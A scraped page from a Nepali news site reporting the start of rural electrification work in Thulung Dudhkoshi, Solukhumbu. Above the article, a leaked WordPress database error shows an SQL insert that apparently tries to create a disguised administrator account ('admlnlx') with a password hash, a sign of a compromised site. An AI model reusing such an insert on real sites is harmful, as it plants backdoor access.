WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BbDTh01p9uQq1G2.ZB/mV.LiS8CnA8.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-27 09:27:26', '', 'admlnlx', 'admlnlx')

थुलुङ दुधकोशीमा ग्रामिण विद्युतिकरणको काम सुरु – Gaule Khabar

थुलुङ दुधकोशीमा ग्रामिण विद्युतिकरणको काम सुरु

थुलुङ दुधकोशीमा ग्रामिण विद्युतिकरणको काम सुरु

गाउँले न्युज, सोलुखुम्बु । सोलुखुम्बुको थुलुङ दुधकोशी गाउँपालिकामा ग्रामिण बिद्युतिकरणको काम सुरु भएको छ । गाउँपालिकाको वडा नम्बर १ नेलेबाट आईबार एक कार्यक्रमका वीच कामको थालनि गरिएको हो । आईतबारबाट सुरु भएको विद्युतिकरणको काम २ बर्ष भित्र सकिने गरि थालनि गरिएको गाउँपालिका अध्यक्ष असिम राईले बताए ।

गाउँपालिकामा ग्रामिण विद्युतिकरणका नेपाल विद्युत प्रधिकरणको २ करोड र संघिय सरकारबाट ३ करोड बजेट विनियोजन भएको छ । आर्ईतबारबाट सुरु भएको विद्युत पोल गाड्ने काम ३ महिना भित्र पञ्चन सम्म पुर्‍याउने लक्ष्य राखिएको प्राधिकिरण सल्लेरीका प्रमुख डेगराज पौडयलले बताए ।

sourse:solufm

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका